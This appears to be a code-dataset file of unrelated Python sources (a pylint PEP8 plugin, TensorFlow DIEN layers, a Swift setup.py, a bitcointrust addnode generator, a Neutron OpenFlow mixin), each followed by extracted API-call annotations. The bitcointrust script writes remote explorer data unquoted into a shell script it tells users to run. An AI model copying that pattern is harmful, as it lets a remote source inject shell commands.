class PEP8Statement(_PEP8BaseChecker):
'''
Process PEP8 E7 codes
'''
_msgs = {
'E8701': ('PEP8 %s: multiple statements on one line (colon)',
'multiple-statements-on-one-line-(colon)'),
'E8702': ('PEP8 %s: multiple statements on one line (semicolon)',
'multiple-statements-on-one-line-(semicolon)'),
'E8703': ('PEP8 %s: statement ends with a semicolon',
'statement-ends-with-a-semicolon'),
'E8711': ("PEP8 %s: comparison to None should be 'if cond is None:'",
"comparison-to-None-should-be-'if-cond-is-None:'"),
'E8712': ("PEP8 %s: comparison to True should be 'if cond is True:' or 'if cond:'",
"comparison-to-True-should-be-'if-cond-is-True:'-or-'if-cond:'"),
'E8713': ("PEP8 %s: test for membership should be 'not in'",
"test-for-membership-should-be 'not in'"),
'E8714': ("PEP8 %s: test for object identity should be 'is not'",
"test-for-object-identity-should-be-'is not'"),
'E8721': ("PEP8 %s: do not compare types, use 'isinstance()'",
"do-not-compare-types,-use-'isinstance()'"),
}
class PEP8Runtime(_PEP8BaseChecker):
'''
Process PEP8 E9 codes
'''
_msgs = {
'E8901': ('PEP8 %s: SyntaxError or IndentationError',
'SyntaxError-or-IndentationError'),
'E8902': ('PEP8 %s: IOError', 'IOError'),
}
class PEP8IndentationWarning(_PEP8BaseChecker):
'''
Process PEP8 W1 codes
'''
_msgs = {
'W8191': ('PEP8 %s: indentation contains tabs',
'indentation-contains-tabs'),
}
class PEP8WhitespaceWarning(_PEP8BaseChecker):
'''
Process PEP8 W2 codes
'''
_msgs = {
'W8291': ('PEP8 %s: trailing whitespace',
'trailing-whitespace' if pylint_version_info < (1, 0) else
'pep8-trailing-whitespace'),
'W8292': ('PEP8 %s: no newline at end of file', 'no-newline-at-end-of-file'),
'W8293': ('PEP8 %s: blank line contains whitespace',
'blank-line-contains-whitespace'),
}
msgs_map = {
'W8291': 'C0303',
'W8293': 'C0303'
}
class PEP8BlankLineWarning(_PEP8BaseChecker):
'''
Process PEP8 W3 codes
'''
_msgs = {
'W8391': ('PEP8 %s: blank line at end of file',
'blank-line-at-end-of-file'),
}
class PEP8DeprecationWarning(_PEP8BaseChecker):
'''
Process PEP8 W6 codes
'''
_msgs = {
'W8601': ("PEP8 %s: .has_key() is deprecated, use 'in'",
".has_key()-is-deprecated,-use-'in'"),
'W8602': ('PEP8 %s: deprecated form of raising exception',
'deprecated-form-of-raising-exception'),
'W8603': ("PEP8 %s: '<>' is deprecated, use '!='",
"'<>'-is-deprecated,-use-'!='"),
'W8604': ("PEP8 %s: backticks are deprecated, use 'repr()'",
"backticks-are-deprecated,-use-'repr()'")
}
# ----- Keep Track Of Handled PEP8 MSG IDs -------------------------------------------------------------------------->
for checker in locals().values():
try:
if issubclass(checker, _PEP8BaseChecker):
_KNOWN_PEP8_IDS.extend(checker._msgs.keys())
except TypeError:
# Not a class
continue
# <---- Keep Track Of Handled PEP8 MSG IDs ---------------------------------------------------------------------------
def register(linter):
'''
required method to auto-register this checker
'''
if HAS_PEP8 is False:
return
linter.register_checker(PEP8Indentation(linter))
linter.register_checker(PEP8Whitespace(linter))
linter.register_checker(PEP8BlankLine(linter))
linter.register_checker(PEP8Import(linter))
linter.register_checker(PEP8LineLength(linter))
linter.register_checker(PEP8Statement(linter))
linter.register_checker(PEP8Runtime(linter))
linter.register_checker(PEP8IndentationWarning(linter))
linter.register_checker(PEP8WhitespaceWarning(linter))
linter.register_checker(PEP8BlankLineWarning(linter))
linter.register_checker(PEP8DeprecationWarning(linter))
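# A minimal usage sketch (assuming this file is importable, e.g. saved as
# pep8pylint.py somewhere on PYTHONPATH; the module name is illustrative):
#   pylint --load-plugins=pep8pylint your_module.py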
|
[
"pep8.StyleGuide",
"warnings.warn",
"pylint.checkers.BaseChecker.__init__",
"logging.getLogger"
] |
[((1090, 1191), 'warnings.warn', 'warnings.warn', (['"""No pep8 library could be imported. No PEP8 check\'s will be done"""', 'RuntimeWarning'], {}), '("No pep8 library could be imported. No PEP8 check\'s will be done"\n , RuntimeWarning)\n', (1103, 1191), False, 'import warnings\n'), ((2464, 2505), 'pylint.checkers.BaseChecker.__init__', 'BaseChecker.__init__', (['self'], {'linter': 'linter'}), '(self, linter=linter)\n', (2484, 2505), False, 'from pylint.checkers import BaseChecker\n'), ((2737, 2826), 'pep8.StyleGuide', 'StyleGuide', ([], {'parse_argv': '(False)', 'config_file': '(True)', 'quiet': '(2)', 'reporter': 'PyLintPEP8Reporter'}), '(parse_argv=False, config_file=True, quiet=2, reporter=\n PyLintPEP8Reporter)\n', (2747, 2826), False, 'from pep8 import StyleGuide, BaseReport\n'), ((3557, 3584), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (3574, 3584), False, 'import logging\n')]
|
import tensorflow as tf
from tensorflow import keras
def compute_his_average(his_embedding, mask):
"""
:param his_embedding: None,his_len,embedding_size
:param mask: None,his_len
:return:his_embedding_average
"""
mask = tf.expand_dims(mask, axis=-1)
mask = tf.cast(mask, dtype=his_embedding.dtype)
his_embedding *= mask
mask_sum = tf.reduce_sum(mask, axis=1) # None,1
embedding_sum = tf.reduce_sum(his_embedding, axis=1)
his_embedding_average = embedding_sum / mask_sum
return his_embedding_average
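# Illustrative example (added; not part of the original file). With one user,
# two valid history slots and one padded slot:
#   his_embedding = tf.constant([[[2.0], [4.0], [9.0]]])  # shape 1,3,1
#   mask = tf.constant([[1, 1, 0]])                       # shape 1,3
#   compute_his_average(his_embedding, mask)  # -> [[3.0]], the mean of 2 and 4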
class MLP(keras.layers.Layer):
def __init__(self, units, last_activation):
super().__init__()
self.bn = keras.layers.BatchNormalization()
self.mlp = [keras.layers.Dense(unit, activation='relu') for unit in units[:-1]]
self.mlp.append(keras.layers.Dense(units[-1], activation=last_activation))
def call(self, inputs, training=False):
inputs = self.bn(inputs, training=training)
for layer in self.mlp:
inputs = layer(inputs)
return inputs
class LocalActivationUnit(tf.keras.layers.Layer):
def __init__(self):
super().__init__()
self.layer_1 = tf.keras.layers.Dense(80, activation=tf.nn.sigmoid)
self.layer_2 = tf.keras.layers.Dense(40, activation=tf.nn.sigmoid)
self.layer_3 = tf.keras.layers.Dense(1)
def call(self, inputs, mask=None):
"""
:param target: None,1,embedding_size
:param history: None,history_max_length,embedding_size
:param mask: None,history_max_length
:return:
"""
target, history = inputs
target = tf.repeat(target, repeats=[history.shape[1]], axis=1) # None,his_max_length,embedding_size
concat = tf.concat([target, history, target - history, target * history], axis=-1)
weights = self.layer_1(concat)
weights = self.layer_2(weights)
weights = self.layer_3(weights) # None,history_max_length,1
mask = tf.expand_dims(mask, axis=-1) # None,history_max_length,1
mask = tf.cast(mask, dtype=weights.dtype)
weights *= mask
history_representation = tf.matmul(weights, history, transpose_a=True) # None,1,embedding_size
history_representation = tf.squeeze(history_representation, axis=1)
return history_representation
class AuxiliaryNet(keras.layers.Layer):
def __init__(self, mlp_units):
super(AuxiliaryNet, self).__init__()
# self.bn = keras.layers.BatchNormalization()
self.layers = [keras.layers.Dense(unit, activation='sigmoid') for unit in mlp_units[:-1]]
self.layers.append(keras.layers.Dense(mlp_units[-1], activation=None))
def call(self, inputs, training=False, **kwargs):
# inputs = self.bn(inputs, training=training)
for layer in self.layers:
inputs = layer(inputs)
return inputs
class InterestExtract(keras.layers.Layer):
def __init__(self, gru_units):
super().__init__()
self.gru = keras.layers.GRU(units=gru_units, return_sequences=True)
self.auxiliary_net = AuxiliaryNet([80, 40, 1])
def compute_logits(self, inputs, training=False):
hidden_state, history = inputs
concat = tf.concat([hidden_state, history], axis=-1)
logits = self.auxiliary_net(concat, training=training)
logits = tf.squeeze(logits, axis=-1)
return logits
def compute_auxiliary_loss(self, inputs, training=False, mask=None):
hidden_state, pos_his_embedding, neg_his_embedding = inputs
hidden_state = hidden_state[:, :-1, :]
pos_history = pos_his_embedding[:, 1:, :]
neg_history = neg_his_embedding[:, 1:, :]
mask = mask[:, 1:]
pos_logits = self.compute_logits((hidden_state, pos_history), training) # None,his_len
neg_logits = self.compute_logits((hidden_state, neg_history), training) # None,his_len
pos_label = tf.ones_like(pos_logits)
neg_label = tf.zeros_like(neg_logits)
pos_loss = tf.nn.sigmoid_cross_entropy_with_logits(pos_label, pos_logits) # None,his_len
neg_loss = tf.nn.sigmoid_cross_entropy_with_logits(neg_label, neg_logits) # None,his_len
mask = tf.cast(mask, pos_loss.dtype)
pos_loss *= mask
neg_loss *= mask
auxiliary_loss_concat = tf.concat([pos_loss, neg_loss], axis=-1)
auxiliary_loss_sum = tf.reduce_sum(auxiliary_loss_concat, axis=-1) # None,
mask_sum = tf.reduce_sum(mask, axis=-1) * 2.
auxiliary_loss = auxiliary_loss_sum / mask_sum
return auxiliary_loss # None,
# https://github.com/mouna99/dien.git implementation
# click_input_ = tf.concat([hidden_state, pos_history], -1) # None,his_len,embedding_size
# noclick_input_ = tf.concat([hidden_state, neg_history], -1) # None,his_len,embedding_size
# click_prop_ = self.mlp(click_input_, training)
# click_prop_ = tf.sigmoid(click_prop_)
# click_prop_ = tf.squeeze(click_prop_, axis=-1) # None,his_len
# noclick_prop_ = self.mlp(noclick_input_, training)
# noclick_prop_ = tf.sigmoid(noclick_prop_)
# noclick_prop_ = tf.squeeze(noclick_prop_, axis=-1) # None,his_len
# click_loss_ = - tf.math.log(click_prop_) * mask
# noclick_loss_ = - tf.math.log(1.0 - noclick_prop_) * mask
# loss_ = click_loss_ + noclick_loss_
# # loss_ = tf.reduce_mean(loss_)
# return loss_
def call(self, inputs, training=False, mask=None):
"""
pos_his: None,his_len,input_size
neg_his: None,his_len,input_size
mask: None,his_len
"""
pos_history, neg_history = inputs
hidden_state = self.gru(pos_history, mask=mask)
auxiliary_loss = self.compute_auxiliary_loss((hidden_state, pos_history, neg_history), training, mask)
return hidden_state, auxiliary_loss
class DIENAttention(keras.layers.Layer):
def __init__(self):
super().__init__()
def build(self, input_shape):
target_shape = input_shape[0]
hidden_shape = input_shape[1]
self.kernel = self.add_weight(shape=(hidden_shape[-1], target_shape[-1]))
def call(self, inputs, training=False, mask=None):
"""
hidden_state: None,his_len,hidden_size
target: None,1,input_size
mask: None,his_len
"""
target, hidden_state = inputs
trans = tf.matmul(hidden_state, self.kernel) # None,his_len,input_size
score = tf.matmul(trans, target, transpose_b=True) # None,his_len,1
mask = tf.expand_dims(mask, axis=-1)
mask = tf.cast(mask, dtype=score.dtype)
score += (1. - mask) * -1e9
score = tf.nn.softmax(score, axis=1)
return score
class AUGRUCell(keras.layers.AbstractRNNCell):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.update_gate = keras.layers.Dense(units, activation=tf.nn.sigmoid)
self.reset_gate = keras.layers.Dense(units, activation=tf.nn.sigmoid)
self.hidden_layer = keras.layers.Dense(units, activation=tf.nn.tanh)
@property
def state_size(self):
return self.units
def call(self, inputs, states):
"""
states: None,hidden_size
inputs: None,input_size
"""
prev_output = states[0]
attention_score = inputs[:, -1:]
inputs = inputs[:, :-1]
concat = tf.concat([prev_output, inputs], axis=-1)
update_state = self.update_gate(concat)
reset_state = self.reset_gate(concat)
hidden_state = self.hidden_layer(tf.concat([inputs, reset_state * prev_output], axis=-1))
update_state *= attention_score
output = update_state * hidden_state + (1 - update_state) * prev_output
return output, output
class InterestEvolve(keras.layers.Layer):
def __init__(self, gru_units):
super().__init__()
self.augru = keras.layers.RNN(AUGRUCell(gru_units))
def call(self, inputs, training=False, mask=None):
"""
history_state: None,his_len,input_size
attention_score: None,his_len,1
"""
history_state, attention_score = inputs
inputs = tf.concat([history_state, attention_score], axis=-1)
output = self.augru(inputs, mask=mask)
return output
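# --- Illustrative wiring sketch (added; not part of the original file). The
# layer names come from the code above; the shapes and random inputs below are
# assumptions for demonstration only. ---
if __name__ == "__main__":
    batch, his_len, emb = 4, 10, 8
    target = tf.random.normal((batch, 1, emb))        # candidate item
    pos_his = tf.random.normal((batch, his_len, emb))  # clicked history
    neg_his = tf.random.normal((batch, his_len, emb))  # sampled negatives
    mask = tf.ones((batch, his_len), dtype=tf.bool)    # all slots valid
    hidden, aux_loss = InterestExtract(gru_units=emb)((pos_his, neg_his), mask=mask)
    score = DIENAttention()((target, hidden), mask=mask)  # None,his_len,1
    final_state = InterestEvolve(gru_units=emb)((hidden, score), mask=mask)
    print(final_state.shape, aux_loss.shape)             # (4, 8) (4,)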
|
[
"tensorflow.nn.softmax",
"tensorflow.reduce_sum",
"tensorflow.keras.layers.BatchNormalization",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.layers.GRU",
"tensorflow.concat",
"tensorflow.zeros_like",
"tensorflow.ones_like",
"tensorflow.nn.sigmoid_cross_entropy_with_logits",
"tensorflow.cast",
"tensorflow.matmul",
"tensorflow.squeeze",
"tensorflow.repeat",
"tensorflow.expand_dims"
] |
[((246, 275), 'tensorflow.expand_dims', 'tf.expand_dims', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (260, 275), True, 'import tensorflow as tf\n'), ((287, 327), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'his_embedding.dtype'}), '(mask, dtype=his_embedding.dtype)\n', (294, 327), True, 'import tensorflow as tf\n'), ((369, 396), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['mask'], {'axis': '(1)'}), '(mask, axis=1)\n', (382, 396), True, 'import tensorflow as tf\n'), ((427, 463), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['his_embedding'], {'axis': '(1)'}), '(his_embedding, axis=1)\n', (440, 463), True, 'import tensorflow as tf\n'), ((676, 709), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (707, 709), False, 'from tensorflow import keras\n'), ((1192, 1243), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(80)'], {'activation': 'tf.nn.sigmoid'}), '(80, activation=tf.nn.sigmoid)\n', (1213, 1243), True, 'import tensorflow as tf\n'), ((1267, 1318), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(40)'], {'activation': 'tf.nn.sigmoid'}), '(40, activation=tf.nn.sigmoid)\n', (1288, 1318), True, 'import tensorflow as tf\n'), ((1342, 1366), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)'], {}), '(1)\n', (1363, 1366), True, 'import tensorflow as tf\n'), ((1651, 1704), 'tensorflow.repeat', 'tf.repeat', (['target'], {'repeats': '[history.shape[1]]', 'axis': '(1)'}), '(target, repeats=[history.shape[1]], axis=1)\n', (1660, 1704), True, 'import tensorflow as tf\n'), ((1760, 1833), 'tensorflow.concat', 'tf.concat', (['[target, history, target - history, target * history]'], {'axis': '(-1)'}), '([target, history, target - history, target * history], axis=-1)\n', (1769, 1833), True, 'import tensorflow as tf\n'), ((1997, 2026), 'tensorflow.expand_dims', 'tf.expand_dims', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (2011, 2026), True, 'import tensorflow as tf\n'), ((2071, 2105), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'weights.dtype'}), '(mask, dtype=weights.dtype)\n', (2078, 2105), True, 'import tensorflow as tf\n'), ((2163, 2208), 'tensorflow.matmul', 'tf.matmul', (['weights', 'history'], {'transpose_a': '(True)'}), '(weights, history, transpose_a=True)\n', (2172, 2208), True, 'import tensorflow as tf\n'), ((2267, 2309), 'tensorflow.squeeze', 'tf.squeeze', (['history_representation'], {'axis': '(1)'}), '(history_representation, axis=1)\n', (2277, 2309), True, 'import tensorflow as tf\n'), ((3027, 3083), 'tensorflow.keras.layers.GRU', 'keras.layers.GRU', ([], {'units': 'gru_units', 'return_sequences': '(True)'}), '(units=gru_units, return_sequences=True)\n', (3043, 3083), False, 'from tensorflow import keras\n'), ((3250, 3293), 'tensorflow.concat', 'tf.concat', (['[hidden_state, history]'], {'axis': '(-1)'}), '([hidden_state, history], axis=-1)\n', (3259, 3293), True, 'import tensorflow as tf\n'), ((3374, 3401), 'tensorflow.squeeze', 'tf.squeeze', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\n', (3384, 3401), True, 'import tensorflow as tf\n'), ((3952, 3976), 'tensorflow.ones_like', 'tf.ones_like', (['pos_logits'], {}), '(pos_logits)\n', (3964, 3976), True, 'import tensorflow as tf\n'), ((3997, 4022), 'tensorflow.zeros_like', 'tf.zeros_like', (['neg_logits'], {}), '(neg_logits)\n', (4010, 4022), True, 'import tensorflow as tf\n'), ((4042, 4104), 'tensorflow.nn.sigmoid_cross_entropy_with_logits', 'tf.nn.sigmoid_cross_entropy_with_logits', (['pos_label', 'pos_logits'], {}), 
'(pos_label, pos_logits)\n', (4081, 4104), True, 'import tensorflow as tf\n'), ((4140, 4202), 'tensorflow.nn.sigmoid_cross_entropy_with_logits', 'tf.nn.sigmoid_cross_entropy_with_logits', (['neg_label', 'neg_logits'], {}), '(neg_label, neg_logits)\n', (4179, 4202), True, 'import tensorflow as tf\n'), ((4234, 4263), 'tensorflow.cast', 'tf.cast', (['mask', 'pos_loss.dtype'], {}), '(mask, pos_loss.dtype)\n', (4241, 4263), True, 'import tensorflow as tf\n'), ((4346, 4386), 'tensorflow.concat', 'tf.concat', (['[pos_loss, neg_loss]'], {'axis': '(-1)'}), '([pos_loss, neg_loss], axis=-1)\n', (4355, 4386), True, 'import tensorflow as tf\n'), ((4416, 4461), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['auxiliary_loss_concat'], {'axis': '(-1)'}), '(auxiliary_loss_concat, axis=-1)\n', (4429, 4461), True, 'import tensorflow as tf\n'), ((6455, 6491), 'tensorflow.matmul', 'tf.matmul', (['hidden_state', 'self.kernel'], {}), '(hidden_state, self.kernel)\n', (6464, 6491), True, 'import tensorflow as tf\n'), ((6535, 6577), 'tensorflow.matmul', 'tf.matmul', (['trans', 'target'], {'transpose_b': '(True)'}), '(trans, target, transpose_b=True)\n', (6544, 6577), True, 'import tensorflow as tf\n'), ((6611, 6640), 'tensorflow.expand_dims', 'tf.expand_dims', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (6625, 6640), True, 'import tensorflow as tf\n'), ((6656, 6688), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'score.dtype'}), '(mask, dtype=score.dtype)\n', (6663, 6688), True, 'import tensorflow as tf\n'), ((6741, 6769), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['score'], {'axis': '(1)'}), '(score, axis=1)\n', (6754, 6769), True, 'import tensorflow as tf\n'), ((6970, 7021), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units'], {'activation': 'tf.nn.sigmoid'}), '(units, activation=tf.nn.sigmoid)\n', (6988, 7021), False, 'from tensorflow import keras\n'), ((7048, 7099), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units'], {'activation': 'tf.nn.sigmoid'}), '(units, activation=tf.nn.sigmoid)\n', (7066, 7099), False, 'from tensorflow import keras\n'), ((7128, 7176), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units'], {'activation': 'tf.nn.tanh'}), '(units, activation=tf.nn.tanh)\n', (7146, 7176), False, 'from tensorflow import keras\n'), ((7492, 7533), 'tensorflow.concat', 'tf.concat', (['[prev_output, inputs]'], {'axis': '(-1)'}), '([prev_output, inputs], axis=-1)\n', (7501, 7533), True, 'import tensorflow as tf\n'), ((8275, 8327), 'tensorflow.concat', 'tf.concat', (['[history_state, attention_score]'], {'axis': '(-1)'}), '([history_state, attention_score], axis=-1)\n', (8284, 8327), True, 'import tensorflow as tf\n'), ((730, 773), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['unit'], {'activation': '"""relu"""'}), "(unit, activation='relu')\n", (748, 773), False, 'from tensorflow import keras\n'), ((822, 879), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units[-1]'], {'activation': 'last_activation'}), '(units[-1], activation=last_activation)\n', (840, 879), False, 'from tensorflow import keras\n'), ((2547, 2593), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['unit'], {'activation': '"""sigmoid"""'}), "(unit, activation='sigmoid')\n", (2565, 2593), False, 'from tensorflow import keras\n'), ((2649, 2699), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['mlp_units[-1]'], {'activation': 'None'}), '(mlp_units[-1], activation=None)\n', (2667, 2699), False, 'from tensorflow import keras\n'), ((4490, 4518), 
'tensorflow.reduce_sum', 'tf.reduce_sum', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (4503, 4518), True, 'import tensorflow as tf\n'), ((7670, 7725), 'tensorflow.concat', 'tf.concat', (['[inputs, reset_state * prev_output]'], {'axis': '(-1)'}), '([inputs, reset_state * prev_output], axis=-1)\n', (7679, 7725), True, 'import tensorflow as tf\n')]
|
# Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from file_connector.swift import _pkginfo
setup(
name=_pkginfo.name,
version=_pkginfo.full_version,
description='Nas Connector',
license='Apache License (2.0)',
author='SwiftStack',
packages=find_packages(exclude=['test', 'bin']),
test_suite='nose.collector',
classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: OpenStack',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: POSIX :: Linux',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
],
install_requires=[],
#scripts=[
# 'bin/fileconnector-gen-builders',
#],
entry_points={
'paste.app_factory': [
'proxy=file_connector.swift.proxy.server:app_factory',
'object=file_connector.swift.obj.server:app_factory',
'container=file_connector.swift.container.server:app_factory',
'account=file_connector.swift.account.server:app_factory',
],
'paste.filter_factory': [
'file_auth=file_connector.swift.common.middleware.'
'file_auth:filter_factory'
],
},
)
|
[
"setuptools.find_packages"
] |
[((844, 882), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['test', 'bin']"}), "(exclude=['test', 'bin'])\n", (857, 882), False, 'from setuptools import setup, find_packages\n')]
|
#!/usr/bin/env python3
"""
Manually add bitcointrust nodes to the daemon, fetching peer information
from the block explorer.
(python 3.x)
"""
import json
import requests
from config import *
try:
    # Get the nodes seen in the last 24 hours from the blockchain explorer
data = requests.get(URL_EXPLORER)
if data.status_code == 200: # OK
with open("./addnodes.sh", "w") as text_file:
text_file.write(f"#!/bin/bash\n# This file is autogenerated by print_active_nodes.py\n")
for i in json.loads(data.text)[0]['nodes']:
print(f"Node: {i}")
text_file.write(f"echo Adding node {i}\n")
if not DATADIR:
text_file.write(f"{DAEMON_PATH} addnode {i} add\n")
else:
text_file.write(f"{DAEMON_PATH} --datadir={DATADIR} addnode {i} add\n")
print("\nPlease run addnodes.sh to add nodes to bitcointrust daemon.")
else:
print(f"Bitcointrust Blockchain Explorer not responding ( {URL_EXPLORER} )")
except Exception:
print(f"ERROR: No connection for {URL_EXPLORER} ")
|
[
"json.loads",
"requests.get"
] |
[((307, 333), 'requests.get', 'requests.get', (['URL_EXPLORER'], {}), '(URL_EXPLORER)\n', (319, 333), False, 'import requests\n'), ((547, 568), 'json.loads', 'json.loads', (['data.text'], {}), '(data.text)\n', (557, 568), False, 'import json\n')]
|
# Copyright (C) 2014,2015 VA Linux Systems Japan K.K.
# Copyright (C) 2014,2015 <NAME> <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import random
import eventlet
import netaddr
from neutron_lib import exceptions
import os_ken.app.ofctl.api as ofctl_api
import os_ken.exception as os_ken_exc
from os_ken.lib import ofctl_string
from os_ken.ofproto import ofproto_parser
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import timeutils
import six
from neutron._i18n import _
from neutron.agent.common import ovs_lib
LOG = logging.getLogger(__name__)
BUNDLE_ID_WIDTH = 1 << 32
COOKIE_DEFAULT = object()
class ActiveBundleRunning(exceptions.NeutronException):
message = _("Another active bundle 0x%(bundle_id)x is running")
class OpenFlowSwitchMixin(object):
"""Mixin to provide common convenient routines for an openflow switch.
NOTE(yamamoto): super() points to ovs_lib.OVSBridge.
See ovs_bridge.py how this class is actually used.
"""
@staticmethod
def _cidr_to_os_ken(ip):
n = netaddr.IPNetwork(ip)
if n.hostmask:
return (str(n.ip), str(n.netmask))
return str(n.ip)
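    # Illustrative results of the helper above (added note):
    #   _cidr_to_os_ken("10.0.0.0/24") -> ("10.0.0.0", "255.255.255.0")
    #   _cidr_to_os_ken("10.0.0.1/32") -> "10.0.0.1"  (hostmask is zero)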
def __init__(self, *args, **kwargs):
self._app = kwargs.pop('os_ken_app')
self.active_bundles = set()
super(OpenFlowSwitchMixin, self).__init__(*args, **kwargs)
def _get_dp_by_dpid(self, dpid_int):
"""Get os-ken datapath object for the switch."""
timeout_sec = cfg.CONF.OVS.of_connect_timeout
start_time = timeutils.now()
while True:
dp = ofctl_api.get_datapath(self._app, dpid_int)
if dp is not None:
break
# The switch has not established a connection to us.
# Wait for a little.
if timeutils.now() > start_time + timeout_sec:
m = _("Switch connection timeout")
LOG.error(m)
# NOTE(yamamoto): use RuntimeError for compat with ovs_lib
raise RuntimeError(m)
eventlet.sleep(1)
return dp
def _send_msg(self, msg, reply_cls=None, reply_multi=False,
active_bundle=None):
timeout_sec = cfg.CONF.OVS.of_request_timeout
timeout = eventlet.Timeout(seconds=timeout_sec)
if active_bundle is not None:
(dp, ofp, ofpp) = self._get_dp()
msg = ofpp.ONFBundleAddMsg(dp, active_bundle['id'],
active_bundle['bundle_flags'], msg, [])
try:
result = ofctl_api.send_msg(self._app, msg, reply_cls, reply_multi)
except os_ken_exc.OSKenException as e:
m = _("ofctl request %(request)s error %(error)s") % {
"request": msg,
"error": e,
}
LOG.error(m)
# NOTE(yamamoto): use RuntimeError for compat with ovs_lib
raise RuntimeError(m)
except eventlet.Timeout as e:
with excutils.save_and_reraise_exception() as ctx:
if e is timeout:
ctx.reraise = False
m = _("ofctl request %(request)s timed out") % {
"request": msg,
}
LOG.error(m)
# NOTE(yamamoto): use RuntimeError for compat with ovs_lib
raise RuntimeError(m)
finally:
timeout.cancel()
LOG.debug("ofctl request %(request)s result %(result)s",
{"request": msg, "result": result})
return result
@staticmethod
def _match(_ofp, ofpp, match, **match_kwargs):
if match is not None:
return match
return ofpp.OFPMatch(**match_kwargs)
def uninstall_flows(self, table_id=None, strict=False, priority=0,
cookie=COOKIE_DEFAULT, cookie_mask=0,
match=None, active_bundle=None, **match_kwargs):
(dp, ofp, ofpp) = self._get_dp()
if table_id is None:
table_id = ofp.OFPTT_ALL
if cookie == ovs_lib.COOKIE_ANY:
cookie = 0
if cookie_mask != 0:
raise Exception(_("cookie=COOKIE_ANY but cookie_mask set to "
"%s") %
cookie_mask)
elif cookie == COOKIE_DEFAULT:
cookie = self._default_cookie
cookie_mask = ovs_lib.UINT64_BITMASK
match = self._match(ofp, ofpp, match, **match_kwargs)
if strict:
cmd = ofp.OFPFC_DELETE_STRICT
else:
cmd = ofp.OFPFC_DELETE
msg = ofpp.OFPFlowMod(dp,
command=cmd,
cookie=cookie,
cookie_mask=cookie_mask,
table_id=table_id,
match=match,
priority=priority,
out_group=ofp.OFPG_ANY,
out_port=ofp.OFPP_ANY)
self._send_msg(msg, active_bundle=active_bundle)
def dump_flows(self, table_id=None):
(dp, ofp, ofpp) = self._get_dp()
if table_id is None:
table_id = ofp.OFPTT_ALL
msg = ofpp.OFPFlowStatsRequest(dp, table_id=table_id)
replies = self._send_msg(msg,
reply_cls=ofpp.OFPFlowStatsReply,
reply_multi=True)
flows = []
for rep in replies:
flows += rep.body
return flows
def _dump_and_clean(self, table_id=None):
cookies = set([f.cookie for f in self.dump_flows(table_id)]) - \
self.reserved_cookies
for c in cookies:
LOG.warning("Deleting flow with cookie 0x%(cookie)x",
{'cookie': c})
self.uninstall_flows(cookie=c, cookie_mask=ovs_lib.UINT64_BITMASK)
def cleanup_flows(self):
LOG.info("Reserved cookies for %s: %s", self.br_name,
self.reserved_cookies)
for table_id in self.of_tables:
self._dump_and_clean(table_id)
def install_goto_next(self, table_id, active_bundle=None):
self.install_goto(table_id=table_id, dest_table_id=table_id + 1,
active_bundle=active_bundle)
def install_output(self, port, table_id=0, priority=0,
match=None, **match_kwargs):
(_dp, ofp, ofpp) = self._get_dp()
actions = [ofpp.OFPActionOutput(port, 0)]
instructions = [ofpp.OFPInstructionActions(
ofp.OFPIT_APPLY_ACTIONS, actions)]
self.install_instructions(table_id=table_id, priority=priority,
instructions=instructions,
match=match, **match_kwargs)
def install_normal(self, table_id=0, priority=0,
match=None, **match_kwargs):
(_dp, ofp, _ofpp) = self._get_dp()
self.install_output(port=ofp.OFPP_NORMAL,
table_id=table_id, priority=priority,
match=match, **match_kwargs)
def install_goto(self, dest_table_id, table_id=0, priority=0,
match=None, **match_kwargs):
(_dp, _ofp, ofpp) = self._get_dp()
instructions = [ofpp.OFPInstructionGotoTable(table_id=dest_table_id)]
self.install_instructions(table_id=table_id, priority=priority,
instructions=instructions,
match=match, **match_kwargs)
